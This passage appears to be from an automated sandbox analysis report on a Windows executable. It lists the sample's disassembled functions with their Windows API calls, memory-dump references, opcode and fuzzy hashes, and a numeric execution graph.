                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressCloseHandleModuleProc
                                                                                                      • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                      • API String ID: 4190037839-2401316094
                                                                                                      • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                      • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                      • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                      • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                      Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                      • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                      • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                      • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                      • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                      • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                      • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                      • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                      • String ID:
                                                                                                      • API String ID: 1694776339-0
                                                                                                      • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                      • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                      • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                      • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                      Function 004053B4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                                        • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                        • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$DefaultSystem
                                                                                                      • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                      • API String ID: 1044490935-665933166
                                                                                                      • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                                      • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                                                      • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                                      • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                                                      Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                      • LocalFree.KERNEL32(0073F830,00000000,00401AB4), ref: 00401A1B
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,0073F830,00000000,00401AB4), ref: 00401A3A
                                                                                                      • LocalFree.KERNEL32(00740830,?,00000000,00008000,0073F830,00000000,00401AB4), ref: 00401A79
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                      • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3782394904-0
                                                                                                      • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                      • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                      • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                      • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                      Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                      • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitMessageProcess
                                                                                                      • String ID: Error$Runtime error at 00000000$9@
                                                                                                      • API String ID: 1220098344-1503883590
                                                                                                      • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                      • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                      • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                      • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                                      Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocString
                                                                                                      • String ID:
                                                                                                      • API String ID: 262959230-0
                                                                                                      • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                                      • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                      • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                                      • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                      Function 004030DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                                                      • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CommandHandleLineModule
                                                                                                      • String ID: U1hd.@$`&r
                                                                                                      • API String ID: 2123368496-3853948702
                                                                                                      • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                      • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                      • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                      • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                      Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                      • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                      • String ID:
                                                                                                      • API String ID: 730355536-0
                                                                                                      • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                                      • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                      • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                                      • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                                      Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue
                                                                                                      • String ID: )q@
                                                                                                      • API String ID: 3660427363-2284170586
                                                                                                      • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                                      • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                                                      • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                                      • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                                                      Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                                                      • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                                                      • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                                                      • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1458359878-0
                                                                                                      • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                      • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                      • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                      • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:15.7%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:4.3%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:69
                                                                                                      execution_graph 50165 40cf00 50166 40cf0d 50165->50166 50168 40cf12 50165->50168 50169 406f50 CloseHandle 50166->50169 50169->50168 56342 4413a4 56343 4413ad 56342->56343 56344 4413bb WriteFile 56342->56344 56343->56344 56345 4413c6 56344->56345 50170 492208 50171 49223c 50170->50171 50172 49223e 50171->50172 50173 492252 50171->50173 50316 446fac 18 API calls 50172->50316 50176 492261 50173->50176 50178 49228e 50173->50178 50175 492247 Sleep 50198 4922c5 50175->50198 50177 447008 18 API calls 50176->50177 50180 492270 50177->50180 50182 4922ca 50178->50182 50183 49229d 50178->50183 50184 492278 FindWindowA 50180->50184 50188 4922d9 50182->50188 50189 492320 50182->50189 50306 447008 50183->50306 50186 447288 5 API calls 50184->50186 50190 492289 50186->50190 50187 4922aa 50192 4922b2 FindWindowA 50187->50192 50317 446fac 18 API calls 50188->50317 50195 49237c 50189->50195 50196 49232f 50189->50196 50190->50198 50310 447288 50192->50310 50193 4922e5 50318 446fac 18 API calls 50193->50318 50205 4923d8 50195->50205 50206 49238b 50195->50206 50321 446fac 18 API calls 50196->50321 50356 403420 50198->50356 50200 4922f2 50319 446fac 18 API calls 50200->50319 50201 49233b 50322 446fac 18 API calls 50201->50322 50204 4922ff 50320 446fac 18 API calls 50204->50320 50216 492412 50205->50216 50217 4923e7 50205->50217 50326 446fac 18 API calls 50206->50326 50208 492348 50323 446fac 18 API calls 50208->50323 50210 492397 50327 446fac 18 API calls 50210->50327 50212 49230a SendMessageA 50215 447288 5 API calls 50212->50215 50214 492355 50324 446fac 18 API calls 50214->50324 50215->50190 50225 492421 50216->50225 50226 492460 50216->50226 50220 447008 18 API calls 50217->50220 50218 4923a4 50328 446fac 18 API calls 50218->50328 50223 4923f4 50220->50223 50222 492360 PostMessageA 50325 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50222->50325 50228 4923fc RegisterClipboardFormatA 50223->50228 50224 4923b1 50329 446fac 18 API calls 50224->50329 50331 446fac 18 API calls 50225->50331 50234 49246f 50226->50234 50235 4924b4 50226->50235 50231 447288 5 API calls 50228->50231 50231->50198 50232 4923bc SendNotifyMessageA 50330 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50232->50330 50233 49242d 50332 446fac 18 API calls 50233->50332 50334 446fac 18 API calls 50234->50334 50244 492508 50235->50244 50245 4924c3 50235->50245 50239 49243a 50333 446fac 18 API calls 50239->50333 50240 49247b 50335 446fac 18 API calls 50240->50335 50243 492445 SendMessageA 50248 447288 5 API calls 50243->50248 50253 49256a 50244->50253 50254 492517 50244->50254 50338 446fac 18 API calls 50245->50338 50247 492488 50336 446fac 18 API calls 50247->50336 50248->50190 50249 4924cf 50339 446fac 18 API calls 50249->50339 50252 492493 PostMessageA 50337 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50252->50337 50261 492579 50253->50261 50262 4925f1 50253->50262 50257 447008 18 API calls 50254->50257 50255 4924dc 50340 446fac 18 API calls 50255->50340 50259 492524 50257->50259 50342 42e3a4 SetErrorMode 50259->50342 50260 4924e7 SendNotifyMessageA 50341 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50260->50341 50265 447008 18 API calls 50261->50265 50271 492600 50262->50271 50272 492626 50262->50272 50269 492588 50265->50269 50266 492531 50267 492547 GetLastError 50266->50267 50268 492537 50266->50268 50273 447288 5 API calls 50267->50273 50270 447288 5 API calls 50268->50270 50345 446fac 18 API calls 50269->50345 50274 492545 50270->50274 50350 446fac 18 API calls 50271->50350 50281 492658 50272->50281 50282 492635 50272->50282 50273->50274 50278 447288 5 API calls 50274->50278 50277 49260a FreeLibrary 50351 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50277->50351 50278->50198 50279 49259b GetProcAddress 50283 4925e1 50279->50283 50284 4925a7 50279->50284 50289 492667 50281->50289 50295 49269b 50281->50295 50285 447008 18 API calls 50282->50285 50349 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50283->50349 50346 446fac 18 API calls 50284->50346 50287 492641 50285->50287 50293 492649 CreateMutexA 50287->50293 50352 48c638 18 API calls 50289->50352 50290 4925b3 50347 446fac 18 API calls 50290->50347 50293->50198 50294 4925c0 50298 447288 5 API calls 50294->50298 50295->50198 50354 48c638 18 API calls 50295->50354 50297 492673 50299 492684 OemToCharBuffA 50297->50299 50300 4925d1 50298->50300 50353 48c650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50299->50353 50348 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50300->50348 50303 4926b6 50304 4926c7 CharToOemBuffA 50303->50304 50355 48c650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50304->50355 50307 447010 50306->50307 50360 436088 50307->50360 50309 44702f 50309->50187 50311 447290 50310->50311 50414 4363f0 VariantClear 50311->50414 50313 4472b3 50315 4472ca 50313->50315 50415 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50313->50415 50315->50198 50316->50175 50317->50193 50318->50200 50319->50204 50320->50212 50321->50201 50322->50208 50323->50214 50324->50222 50325->50190 50326->50210 50327->50218 50328->50224 50329->50232 50330->50198 50331->50233 50332->50239 50333->50243 50334->50240 50335->50247 50336->50252 50337->50190 50338->50249 50339->50255 50340->50260 50341->50198 50416 403738 50342->50416 50345->50279 50346->50290 50347->50294 50348->50190 50349->50190 50350->50277 50351->50198 50352->50297 50353->50198 50354->50303 50355->50198 50358 403426 50356->50358 50357 40344b 50358->50357 50359 402660 4 API calls 50358->50359 50359->50358 50361 436094 50360->50361 50377 4360b6 50360->50377 50361->50377 50380 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50361->50380 50362 436139 50389 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50362->50389 50364 436121 50384 403494 50364->50384 50365 436109 50369 403510 4 API calls 50365->50369 50366 4360fd 50381 403510 50366->50381 50367 43612d 50388 4040e8 18 API calls 50367->50388 50374 436112 50369->50374 50373 43614a 50373->50309 50374->50309 50375 436115 50375->50309 50377->50362 50377->50364 50377->50365 50377->50366 50377->50367 50377->50375 50378 436136 50378->50309 50380->50377 50390 4034e0 50381->50390 50386 403498 50384->50386 50385 4034ba 50385->50309 50386->50385 50387 402660 4 API calls 50386->50387 50387->50385 50388->50378 50389->50373 50395 4034bc 50390->50395 50392 4034f0 50400 403400 50392->50400 50396 4034c0 50395->50396 50397 4034dc 50395->50397 50404 402648 50396->50404 50397->50392 50401 40341f 50400->50401 50402 403406 50400->50402 50401->50309 50402->50401 50409 402660 50402->50409 50405 40264c 50404->50405 50407 402656 50404->50407 50405->50407 50408 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50405->50408 50407->50392 50408->50407 50410 402664 50409->50410 50411 40266e 50409->50411 50410->50411 50413 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50410->50413 50411->50401 50411->50411 50413->50411 50414->50313 50415->50315 50417 40373c LoadLibraryA 50416->50417 50417->50266 50418 402584 50419 402598 50418->50419 50420 4025ab 50418->50420 50448 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 50419->50448 50422 4025c2 RtlEnterCriticalSection 50420->50422 50423 4025cc 50420->50423 50422->50423 50434 4023b4 13 API calls 50423->50434 50424 40259d 50424->50420 50426 4025a1 50424->50426 50427 4025d5 50428 4025d9 50427->50428 50435 402088 50427->50435 50430 402635 50428->50430 50431 40262b RtlLeaveCriticalSection 50428->50431 50431->50430 50432 4025e5 50432->50428 50449 402210 9 API calls 50432->50449 50434->50427 50436 40209c 50435->50436 50437 4020af 50435->50437 50456 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 50436->50456 50439 4020c6 RtlEnterCriticalSection 50437->50439 50442 4020d0 50437->50442 50439->50442 50440 4020a1 50440->50437 50441 4020a5 50440->50441 50445 402106 50441->50445 50442->50445 50450 401f94 50442->50450 50445->50432 50446 4021f1 RtlLeaveCriticalSection 50447 4021fb 50446->50447 50447->50432 50448->50424 50449->50428 50453 401fa4 50450->50453 50451 401fd0 50455 401ff4 50451->50455 50462 401db4 50451->50462 50453->50451 50453->50455 50457 401f0c 50453->50457 50455->50446 50455->50447 50456->50440 50466 40178c 50457->50466 50460 401f29 50460->50453 50463 401e02 50462->50463 50464 401dd2 50462->50464 50463->50464 50489 401d1c 50463->50489 50464->50455 50470 4017a8 50466->50470 50467 4017b2 50485 401678 VirtualAlloc 50467->50485 50470->50467 50471 40180f 50470->50471 50473 401803 50470->50473 50477 4014e4 50470->50477 50486 4013e0 LocalAlloc 50470->50486 50471->50460 50476 401e80 9 API calls 50471->50476 50487 4015c0 VirtualFree 50473->50487 50474 4017be 50474->50471 50476->50460 50478 4014f3 VirtualAlloc 50477->50478 50480 401520 50478->50480 50481 401543 50478->50481 50488 401398 LocalAlloc 50480->50488 50481->50470 50483 40152c 50483->50481 50484 401530 VirtualFree 50483->50484 50484->50481 50485->50474 50486->50470 50487->50471 50488->50483 50490 401d2e 50489->50490 50491 401d51 50490->50491 50492 401d63 50490->50492 50502 401940 50491->50502 50494 401940 3 API calls 50492->50494 50495 401d61 50494->50495 50496 401d79 50495->50496 50512 401bf8 9 API calls 50495->50512 50496->50464 50498 401d88 50499 401da2 50498->50499 50513 401c4c 9 API calls 50498->50513 50514 401454 LocalAlloc 50499->50514 50503 401966 50502->50503 50511 4019bf 50502->50511 50515 40170c 50503->50515 50507 401983 50509 40199a 50507->50509 50520 4015c0 VirtualFree 50507->50520 50509->50511 50521 401454 LocalAlloc 50509->50521 50511->50495 50512->50498 50513->50499 50514->50496 50516 401743 50515->50516 50517 401783 50516->50517 50518 40175d VirtualFree 50516->50518 50519 4013e0 LocalAlloc 